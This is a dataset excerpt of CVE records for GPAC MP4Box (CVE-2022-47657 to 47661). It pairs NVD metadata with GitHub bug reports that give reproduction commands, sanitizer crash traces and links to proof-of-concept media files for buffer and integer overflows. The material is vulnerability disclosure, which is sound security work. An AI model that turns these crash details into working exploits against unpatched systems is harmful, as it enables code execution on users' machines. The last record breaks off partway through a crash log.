cve_id
stringlengths 13
16
| cve_published
stringlengths 23
23
| cve_descriptions
stringlengths 48
2.08k
| cve_metrics
dict | cve_references
listlengths 1
138
| cve_configurations
listlengths 1
39
| url
stringlengths 37
77
| cve_tags
sequencelengths 1
4
⌀ | domain
stringclasses 1
value | issue_owner_repo
sequencelengths 2
2
| issue_body
stringlengths 0
88.6k
⌀ | issue_title
stringlengths 3
335
| issue_comments_url
stringlengths 56
81
| issue_comments_count
int64 0
146
| issue_created_at
stringlengths 20
20
| issue_updated_at
stringlengths 20
20
| issue_html_url
stringlengths 37
62
| issue_github_id
int64 104M
2.09B
| issue_number
int64 1
122k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2022-47657 | 2023-01-05T16:15:10.233 | GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to buffer overflow in function hevc_parse_vps_extension of media_tools/av_parsers.c:7662 | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2355"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/2355 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
# Description
buffer overflow in function hevc_parse_vps_extension of media_tools/av_parsers.c:7662
# Version info
latest version atm
```
MP4Box - GPAC version 2.1-DEV-rev644-g5c4df2a67-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
compile and run
```
./configure --enable-sanitizer
make
./MP4Box import -cat poc_bof12.mp4
```
Crash reported by sanitizer
```
[HEVC] Error parsing NAL unit type 33
[HEVC] Error parsing Sequence Param Set
[Core] exp-golomb read failed, not enough bits in bitstream !
[HEVC] Error parsing NAL unit type 33
[HEVC] Error parsing Sequence Param Set
[Core] exp-golomb read failed, not enough bits in bitstream !
[HEVC] Error parsing NAL unit type 33
[HEVC] Error parsing Sequence Param Set
[HEVC] 51 layers in VPS but only 4 supported in GPAC
[HEVC] Error parsing NAL unit type 32
[HEVC] Error parsing Video Param Set
[HEVC] Error parsing NAL unit type 33
[HEVC] Error parsing NAL unit type 32
[HEVC] Error parsing Video Param Set
[HEVC] Error parsing NAL unit type 33
[HEVC] Error parsing Sequence Param Set
[HEVC] Error parsing NAL unit type 33
[HEVC] Error parsing Sequence Param Set
Track Importing HEVC - Width 1 Height 6 FPS 25000/1000
[HEVC] 56 layers in VPS but only 4 supported in GPAC
[HEVC] Error parsing NAL unit type 32
[HEVC] Error parsing Video Param Set
media_tools/av_parsers.c:7662:23: runtime error: index 56 out of bounds for type 'u32 [4]'
```
# POC
[poc_bof12.zip](https://github.com/gpac/gpac/files/10251497/poc_bof12.zip)
# Impact
Potentially causing DoS and RCE
# Credit
Xdchase
| buffer overflow in function hevc_parse_vps_extension of media_tools/av_parsers.c:7662 | https://api.github.com/repos/gpac/gpac/issues/2355/comments | 0 | 2022-12-17T10:31:33Z | 2022-12-17T11:29:28Z | https://github.com/gpac/gpac/issues/2355 | 1,501,315,271 | 2,355 |
CVE-2022-47658 | 2023-01-05T16:15:10.447 | GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to buffer overflow in function gf_hevc_read_vps_bs_internal of media_tools/av_parsers.c:8039 | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2356"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/2356 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
# Description
buffer overflow in function gf_hevc_read_vps_bs_internal of media_tools/av_parsers.c:8039
# Version info
latest version atm
```
MP4Box - GPAC version 2.1-DEV-rev644-g5c4df2a67-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
compile and run
```
./configure --enable-sanitizer
make
./MP4Box import -cat poc_bof10.mp4
```
Crash reported by sanitizer
```
[Core] exp-golomb read failed, not enough bits in bitstream !
[HEVC] Error parsing NAL unit type 33
[HEVC] Error parsing Sequence Param Set
[HEVC] Error parsing NAL unit type 32
[HEVC] 8 layers in VPS but only 4 supported in GPAC
[HEVC] Error parsing NAL unit type 32
[HEVC] Error parsing Video Param Set
[HEVC] Error parsing NAL unit type 33
Track Importing HEVC - Width 1 Height 6 FPS 488447261/488447261
[HEVC] Error parsing NAL unit type 390)
[HEVC] SEI user message type 249 size error (109 but 15 remain), skipping SEI message
media_tools/av_parsers.c:8039:32: runtime error: index 4 out of bounds for type 'u8 [4]'
```
# POC
[poc_bof10.zip](https://github.com/gpac/gpac/files/10251487/poc_bof10.zip)
# Impact
Potentially causing DoS and RCE
# Credit
Xdchase
| buffer overflow in function gf_hevc_read_vps_bs_internal of media_tools/av_parsers.c:8039 | https://api.github.com/repos/gpac/gpac/issues/2356/comments | 0 | 2022-12-17T10:31:37Z | 2022-12-17T11:29:29Z | https://github.com/gpac/gpac/issues/2356 | 1,501,315,341 | 2,356 |
CVE-2022-47659 | 2023-01-05T16:15:10.670 | GPAC MP4box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to Buffer Overflow in gf_bs_read_data | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2354"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/2354 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
# Description
stack-buffer-overflow utils/bitstream.c:732 in gf_bs_read_data
# Version info
latest version atm
```
MP4Box - GPAC version 2.1-DEV-rev644-g5c4df2a67-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
compile and run
```
./configure --enable-sanitizer
make
./MP4Box import -cat poc_bof11.mp4
```
Crash reported by sanitizer
```
Track Importing AAC - SampleRate 88200 Num Channels 8
=================================================================
==325854==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc52ec0940 at pc 0x7fa1e477c501 bp 0x7ffc52ebf3a0 sp 0x7ffc52ebf390
WRITE of size 1 at 0x7ffc52ec0940 thread T0
#0 0x7fa1e477c500 in gf_bs_read_data utils/bitstream.c:732
#1 0x7fa1e59d0a8c in latm_dmx_sync_frame_bs filters/reframe_latm.c:170
#2 0x7fa1e59d289f in latm_dmx_sync_frame_bs filters/reframe_latm.c:86
#3 0x7fa1e59d289f in latm_dmx_process filters/reframe_latm.c:526
#4 0x7fa1e55eabac in gf_filter_process_task filter_core/filter.c:2795
#5 0x7fa1e55aa703 in gf_fs_thread_proc filter_core/filter_session.c:1859
#6 0x7fa1e55b700e in gf_fs_run filter_core/filter_session.c:2120
#7 0x7fa1e4ff9a21 in gf_media_import media_tools/media_import.c:1551
#8 0x55a84c1ccb4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
#9 0x55a84c1d75d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
#10 0x55a84c181130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
#11 0x55a84c181130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
#12 0x7fa1e2580d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#13 0x7fa1e2580e3f in __libc_start_main_impl ../csu/libc-start.c:392
#14 0x55a84c15dcb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4)
Address 0x7ffc52ec0940 is located in stack of thread T0 at offset 5088 in frame
#0 0x7fa1e59d20af in latm_dmx_process filters/reframe_latm.c:456
This frame has 19 object(s):
[48, 52) 'pck_size' (line 461)
[64, 68) 'latm_frame_size' (line 525)
[80, 84) 'dsi_s' (line 312)
[96, 104) 'output' (line 460)
[128, 136) 'dsi_b' (line 311)
[160, 184) '<unknown>'
[224, 248) '<unknown>'
[288, 312) '<unknown>'
[352, 376) '<unknown>'
[416, 440) '<unknown>'
[480, 504) '<unknown>'
[544, 568) '<unknown>'
[608, 632) '<unknown>'
[672, 696) '<unknown>'
[736, 760) '<unknown>'
[800, 824) '<unknown>'
[864, 888) '<unknown>'
[928, 952) '<unknown>'
[992, 5088) 'latm_buffer' (line 524) <== Memory access at offset 5088 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow utils/bitstream.c:732 in gf_bs_read_data
Shadow bytes around the buggy address:
0x10000a5d00d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000a5d00e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000a5d00f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000a5d0100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000a5d0110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10000a5d0120: 00 00 00 00 00 00 00 00[f3]f3 f3 f3 f3 f3 f3 f3
0x10000a5d0130: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00
0x10000a5d0140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000a5d0150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000a5d0160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000a5d0170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==325854==ABORTING
```
# POC
[poc_bof11.zip](https://github.com/gpac/gpac/files/10251498/poc_bof11.zip)
# Impact
Potentially causing DoS and RCE
# Credit
Xdchase
| stack-buffer-overflow utils/bitstream.c:732 in gf_bs_read_data | https://api.github.com/repos/gpac/gpac/issues/2354/comments | 0 | 2022-12-17T10:31:30Z | 2022-12-17T11:29:28Z | https://github.com/gpac/gpac/issues/2354 | 1,501,315,203 | 2,354 |
CVE-2022-47660 | 2023-01-05T16:15:10.890 | GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is has an integer overflow in isomedia/isom_write.c | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2357"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/2357 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
# Description
integer overflow in isomedia/isom_write.c:4931
# Version info
latest version atm
```
MP4Box - GPAC version 2.1-DEV-rev644-g5c4df2a67-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
compile and run
```
./configure --enable-sanitizer
make
./MP4Box import -cat iof.mp4
```
Crash reported by sanitizer
```
[HEVC] Error parsing NAL unit type 33
[HEVC] Error parsing NAL unit type 32
[HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12
[HEVC] Error parsing NAL unit type 33
[HEVC] Error parsing Sequence Param Set
[HEVC] Error parsing NAL unit type 34
[HEVC] Error parsing NAL unit type 0
Track Importing HEVC - Width 1 Height 6 FPS 488447261/488447261
[HEVC] Error parsing NAL unit type 25
[HEVC] NAL Unit type 25 not handled - adding
[HEVC] Error parsing NAL unit type 32
[HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12
[HEVC] Error parsing NAL unit type 33
[HEVC] Error parsing Sequence Param Set
[HEVC] Error parsing NAL unit type 34
[HEVC] Error parsing NAL unit type 0
[HEVC] Error parsing NAL unit type 32
isomedia/isom_write.c:4931:87: runtime error: signed integer overflow: 1852736474 - -1953749291 cannot be represented in type 'int'
```
# POC
[iof.zip](https://github.com/gpac/gpac/files/10251484/iof.zip)
# Impact
Potentially causing DoS and RCE
# Credit
Xdchase
| integer overflow in isomedia/isom_write.c:4931 | https://api.github.com/repos/gpac/gpac/issues/2357/comments | 0 | 2022-12-17T10:31:40Z | 2022-12-17T11:29:29Z | https://github.com/gpac/gpac/issues/2357 | 1,501,315,390 | 2,357 |
CVE-2022-47661 | 2023-01-05T16:15:11.103 | GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 is vulnerable to Buffer Overflow via media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2358"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/2358 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | - [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels,
# Description
heap-buffer-overflow media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes
# Version info
latest version atm
```
MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
compile and run
```
./configure --enable-sanitizer
make
./MP4Box import -catx poc_bof14.mp4
```
Crash reported by sanitizer
```
[AVC|H264] Error parsing NAL unit type 8
[AVC|H264] Error parsing Picture Param Set
[avc-h264] SEI user message type 71 size error (71 but 27 remain), keeping full SEI untouched
[AVC|H264] Error parsing NAL unit type 8
[AVC|H264] Error parsing Picture Param Set
[AVC|H264] Error parsing NAL unit type 8
[AVC|H264] Error parsing Picture Param Set
[avc-h264] SEI user message has less than 2 bytes remaining but no end of sei found
=================================================================
==745696==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x615000014780 at pc 0x7f373f26d683 bp 0x7ffd5a01c290 sp 0x7ffd5a01c280
WRITE of size 1 at 0x615000014780 thread T0
#0 0x7f373f26d682 in gf_media_nalu_add_emulation_bytes media_tools/av_parsers.c:4988
#1 0x7f373f26d682 in gf_avc_reformat_sei media_tools/av_parsers.c:6355
#2 0x7f373fccee25 in naludmx_push_prefix filters/reframe_nalu.c:2398
#3 0x7f373fcee8ac in naludmx_parse_nal_avc filters/reframe_nalu.c:2821
#4 0x7f373fcee8ac in naludmx_process filters/reframe_nalu.c:3333
#5 0x7f373f8a5f1d in gf_filter_process_task filter_core/filter.c:2815
#6 0x7f373f8655a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
#7 0x7f373f871ece in gf_fs_run filter_core/filter_session.c:2120
#8 0x7f373f2b49c1 in gf_media_import media_tools/media_import.c:1551
#9 0x55b1ec0f1b4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
#10 0x55b1ec0fc5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
#11 0x55b1ec0a6130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
#12 0x55b1ec0a6130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
#13 0x7f373c83bd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#14 0x7f373c83be3f in __libc_start_main_impl ../csu/libc-start.c:392
#15 0x55b1ec082cb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4)
0x615000014780 is located 0 bytes to the right of 512-byte region [0x615000014580,0x615000014780)
allocated by thread T0 here:
#0 0x7f37423a4867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x7f373ea2c72a in gf_bs_new utils/bitstream.c:154
#2 0x7f373f26c993 in gf_avc_reformat_sei media_tools/av_parsers.c:6227
#3 0x7f373fccee25 in naludmx_push_prefix filters/reframe_nalu.c:2398
#4 0x7f373fcee8ac in naludmx_parse_nal_avc filters/reframe_nalu.c:2821
#5 0x7f373fcee8ac in naludmx_process filters/reframe_nalu.c:3333
#6 0x7f373f8a5f1d in gf_filter_process_task filter_core/filter.c:2815
#7 0x7f373f8655a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
#8 0x7f373f871ece in gf_fs_run filter_core/filter_session.c:2120
#9 0x7f373f2b49c1 in gf_media_import media_tools/media_import.c:1551
#10 0x55b1ec0f1b4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
#11 0x55b1ec0fc5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
#12 0x55b1ec0a6130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
#13 0x55b1ec0a6130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
#14 0x7f373c83bd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
SUMMARY: AddressSanitizer: heap-buffer-overflow media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes
Shadow bytes around the buggy address:
0x0c2a7fffa8a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2a7fffa8b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fffa8c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fffa8d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fffa8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c2a7fffa8f0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2a7fffa900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2a7fffa910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2a7fffa920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2a7fffa930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2a7fffa940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==745696==ABORTING
```
if compile without ASAN and run the same poc
```
./configure --static-bin
make
./MP4Box import -catx poc_bof14.mp4
```
The crash will happen at another place
```
[AVC|H264] Error parsing NAL unit type 8
[AVC|H264] Error parsing Picture Param Set
[avc-h264] SEI user message type 71 size error (71 but 27 remain), keeping full SEI untouched
[AVC|H264] Error parsing NAL unit type 8
[AVC|H264] Error parsing Picture Param Set
[AVC|H264] Error parsing NAL unit type 8
[AVC|H264] Error parsing Picture Param Set
[avc-h264] SEI user message has less than 2 bytes remaining but no end of sei found
